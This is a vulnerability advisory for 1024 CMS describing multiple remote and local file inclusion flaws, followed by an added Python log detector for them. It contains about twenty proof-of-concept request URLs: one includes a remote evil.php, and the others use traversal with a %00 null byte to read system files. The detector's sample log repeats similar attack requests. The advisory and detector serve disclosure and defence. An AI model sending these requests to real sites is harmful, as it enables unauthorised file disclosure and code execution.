1024 CMS Multiple File Inclusion Vulnerabilities
Published: 2008-07-04
Updated: 2008-07-08
Affected systems:
Treble Designs 1024 CMS 1.4.4 RFC
Treble Designs 1024 CMS 1.4.3
Description: BUGTRAQ ID: 30091
1024 CMS is a content management system built on PHP and MySQL.
1024 CMS contains multiple file inclusion vulnerabilities that allow a malicious user to disclose sensitive information or compromise a vulnerable system.
1) The files themes/blog/layouts/standard.php, themes/default/layouts/standard.php, themes/portfolio/layouts/standard.php and themes/snazzy/layouts/standard.php use the page_include parameter in a file include without validating it, which allows arbitrary files from local or remote locations to be included. A successful attack requires register_globals to be enabled; including a remote URL additionally depends on PHP's URL include settings (allow_url_fopen, and on PHP 5.2 and later allow_url_include).
2) Multiple files use various parameters in file includes without validating them, which allows arbitrary local files to be included. A successful attack requires magic_quotes_gpc to be disabled, because the NUL byte (%00) used to cut off the file name the script appends is escaped when magic_quotes_gpc is on (PHP 5.3.4 and later reject paths containing a NUL byte outright). The affected parameters and files are listed below.
theme_dir and page parameters:
themes/blog/layouts/standard.php
themes/default/layouts/standard.php
themes/portfolio/layouts/standard.php
themes/snazzy/layouts/standard.php
themes/blog/layouts/total.php
themes/default/layouts/total.php
themes/portfolio/layouts/total.php
themes/snazzy/layouts/total.php
lang parameter:
admin/lang/fr/reports/default.php
lang/en/moderator/default.php
lang/fr/moderator/default.php
lang/de/moderator/default.php
admin_theme_dir parameter:
admin/ops/admins/default.php
admin/ops/reports/ops/download.php
admin/ops/reports/ops/forum.php
admin/ops/reports/ops/news.php
theme_dir parameter:
pages/download/default/ops/add.php
pages/download/default/ops/edit.php
pages/download/default/ops/newest.php
pages/download/default/ops/search.php
pages/download/default/ops/top.php
pages/forum/default/content.php
themes/blog/layouts/basic_footer.php
themes/default/layouts/basic_footer.php
themes/portfolio/layouts/basic_footer.php
themes/snazzy/layouts/basic_footer.php
themes/blog/layouts/basic_header.php
themes/default/layouts/basic_header.php
themes/portfolio/layouts/basic_header.php
themes/snazzy/layouts/basic_header.php
page, page_include and theme_dir parameters:
themes/blog/layouts/print.php
themes/default/layouts/print.php
themes/portfolio/layouts/print.php
themes/snazzy/layouts/print.php
<*Source: Digital Security
Link: http://marc.info/?l=bugtraq&m=121519055217560&w=2
*>
Test method: WARNING
The following programs (methods) may be offensive in nature and are provided solely for security research and teaching. Use at your own risk!
http://www.example.com/[installdir]/themes/blog/layouts/standard.php?page_include=http://www.example.com/evil.php
http://www.example.com/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/snazzy/layouts/standard.php?page=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/lang/fr/reports/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/ops/admins/default.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/ops/reports/ops/news.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/en/moderator/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/fr/moderator/default.php?t=download&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/de/moderator/default.php?t=forum&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/download/default/ops/add.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/download/default/ops/newest.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/forum/default/content.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/blog/layouts/basic_footer.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/basic_header.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/blog/layouts/print.php?page=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/print.php?page_include=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/portfolio/layouts/print.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/total.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/snazzy/layouts/total.php?page=../../../../../../../../../../../../../boot.ini%00
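The requests above leave a recognisable trace in the web server access log: one of the affected scripts, one of the affected parameters, and a value that is either a URL (remote inclusion), contains a directory traversal sequence, or carries a %00 terminator. The following detector is an added example written for this page, not code from 1024 CMS or from the advisory's author. It encodes the script/parameter table from the description above, parses Apache-style combined log lines, and classifies each matching request. The log lines in SAMPLE_LOG are constructed for the example; the IP addresses and install path /cms/ are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Affected script -> parameters that reach include() unvalidated, as listed in
# the advisory; the four theme names expand to one entry per theme.
THEMES = ("blog", "default", "portfolio", "snazzy")
AFFECTED = {}
for t in THEMES:
    AFFECTED[f"themes/{t}/layouts/standard.php"] = {"page_include", "theme_dir", "page"}
    AFFECTED[f"themes/{t}/layouts/total.php"] = {"theme_dir", "page"}
    AFFECTED[f"themes/{t}/layouts/basic_footer.php"] = {"theme_dir"}
    AFFECTED[f"themes/{t}/layouts/basic_header.php"] = {"theme_dir"}
    AFFECTED[f"themes/{t}/layouts/print.php"] = {"page", "page_include", "theme_dir"}
for p in ("admin/lang/fr/reports/default.php", "lang/en/moderator/default.php",
          "lang/fr/moderator/default.php", "lang/de/moderator/default.php"):
    AFFECTED[p] = {"lang"}
for p in ("admin/ops/admins/default.php", "admin/ops/reports/ops/download.php",
          "admin/ops/reports/ops/forum.php", "admin/ops/reports/ops/news.php"):
    AFFECTED[p] = {"admin_theme_dir"}
for p in ("pages/download/default/ops/add.php", "pages/download/default/ops/edit.php",
          "pages/download/default/ops/newest.php", "pages/download/default/ops/search.php",
          "pages/download/default/ops/top.php", "pages/forum/default/content.php"):
    AFFECTED[p] = {"theme_dir"}

# Apache "combined" log format; only client IP, request target and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def classify_value(value):
    """Return the attack class for one decoded parameter value, or None if benign."""
    if SCHEME_RE.match(value):          # http://, ftp://, php://, data:// ...
        return "rfi"
    if "\x00" in value:                 # %00 cuts off the appended file name
        return "lfi-nullbyte"
    if "../" in value or "..\\" in value:
        return "lfi-traversal"
    return None


def parse_query(query):
    """Decode a raw query string once; %00 survives as a real NUL byte."""
    for part in query.split("&"):
        if "=" in part:
            key, _, val = part.partition("=")
            yield unquote(key), unquote(val)


def affected_script(path):
    """Match the request path against the advisory's script list by suffix,
    so the CMS install directory does not have to be known."""
    for script in AFFECTED:
        if path.endswith("/" + script):
            return script
    return None


def scan_line(line):
    """Return a list of findings (possibly empty) for one access log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    script = affected_script(parts.path)
    if script is None:
        return []
    findings = []
    for key, val in parse_query(parts.query):
        if key in AFFECTED[script]:
            kind = classify_value(val)
            if kind:
                findings.append({"ip": m.group("ip"), "script": script,
                                 "param": key, "kind": kind,
                                 "status": int(m.group("status"))})
    return findings


def scan_log(lines):
    """Scan an iterable of log lines and return all findings in order."""
    out = []
    for line in lines:
        out.extend(scan_line(line))
    return out


# Constructed sample log (not real traffic): three attacks, one benign request,
# and one traversal attempt against a script the advisory does not list.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jul/2008:10:00:01 +0000] "GET /cms/themes/blog/layouts/standard.php?page_include=http://198.51.100.7/evil.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Jul/2008:10:00:02 +0000] "GET /cms/lang/en/moderator/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00 HTTP/1.1" 200 3140 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Jul/2008:10:00:03 +0000] "GET /cms/admin/ops/admins/default.php?admin_theme_dir=../../../../etc/passwd HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
198.51.100.20 - - [04/Jul/2008:10:00:04 +0000] "GET /cms/themes/default/layouts/standard.php?page=news HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
198.51.100.20 - - [04/Jul/2008:10:00:05 +0000] "GET /cms/index.php?page=../../etc/passwd HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f['ip']} {f['kind']:14} {f['script']} param={f['param']} status={f['status']}")
```

The detector is deliberately scoped to the script/parameter pairs in this advisory, so the last sample line (a traversal against index.php) is not reported; dropping the affected_script check turns it into a generic LFI/RFI signature at the cost of more noise. A 200 status on a flagged request is the line worth escalating first, since it suggests the include succeeded.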
Recommendation: Vendor patch:
Treble Designs
--------------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:
http://www.1024cms.com/